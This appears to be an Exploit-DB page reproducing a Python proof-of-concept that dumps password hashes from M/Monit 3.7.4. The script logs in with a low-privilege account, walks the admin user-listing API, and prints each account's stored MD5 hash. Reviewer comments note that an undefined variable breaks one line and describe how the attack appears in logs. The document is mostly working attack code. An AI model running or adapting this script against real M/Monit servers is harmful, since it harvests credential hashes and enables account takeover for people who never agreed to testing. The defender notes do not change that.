M/Monit 3.7.4 – Password Disclosure

  • 作者: Dolev Farhi
    日期: 2020-11-19
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49081/
  • # Title: M/Monit 3.7.4 - Password Disclosure
    # Author: Dolev Farhi
    # Date: 2020-07-09
    # Vendor Homepage: https://mmonit.com/
    # Version : 3.7.4
    
    import sys
    import requests
    
    # Base address of the M/Monit web interface; 'your_ip_here' is a placeholder.
    url = 'http://your_ip_here:8080'
    # Credentials of an existing M/Monit account used for the login step.
    # NOTE(review): the listing does not say which role this account holds;
    # presumably a non-admin one, since the later requests target
    # /api/1/admin/ paths. Confirm against the original advisory.
    username = 'test'
    password = 'test123'
    
    # One shared Session, so cookies received on any response are sent again
    # on every later request made by login() and steal_hashes().
    sess = requests.Session()
    # Initial GET, presumably to pick up a session cookie before the login POST.
    # NOTE(review): `host` is never defined in this listing, so this line raises
    # NameError as published; `url` is the only base address defined above.
    sess.get(host)
    
    def login():
        """Authenticate the shared session against M/Monit's login endpoint.

        Posts the module-level ``username`` and ``password`` as a URL-encoded
        form to ``/z_security_check`` and exits the process with status 1 when
        the response is not OK.

        Note: ``resp.ok`` only means the HTTP status is below 400; the response
        body is not inspected, so the "Logged in successfully." message is not
        proof that the credentials were accepted.
        """
        print('Attempting to login...')
        form_headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        credentials = {'z_username': username, 'z_password': password}

        resp = sess.post(url + '/z_security_check', data=credentials, headers=form_headers)
        if not resp.ok:
            print('Could not login.')
            sys.exit(1)
        print('Logged in successfully.')
    
    def steal_hashes():
        """Print the stored password value of every account the API returns.

        Requests ``/api/1/admin/users/list`` with the logged-in session, then
        fetches ``/api/1/admin/users/get?uname=<name>`` for each listed account
        and prints that record's ``password`` field, which the PoC's own output
        describes as an MD5 hash. Does nothing when the list request is not OK.

        Defender note: in web access logs this shows up as one request to the
        users/list path followed by one users/get request per account, all from
        the same session. The underlying issue is that the user record returned
        by the API includes the password hash at all. The affected version
        named on this page is 3.7.4; the page names no fixed release.
        """
        listing = sess.get(url + '/api/1/admin/users/list')
        if not listing.ok:
            return

        for entry in listing.json():
            mmonit_user = entry['uname']
            # One detail request per account; the hash is a field of that record.
            detail = sess.get(url + '/api/1/admin/users/get?uname={}'.format(mmonit_user))
            mmonit_passw = detail.json()['password']
            print('Stolen MD5 hash. User: {}, Hash: {}'.format(mmonit_user, mmonit_passw))
    
    # Script entry point: authenticate first, then run the disclosure check
    # with the same session.
    if __name__ == '__main__':
        login()
        steal_hashes()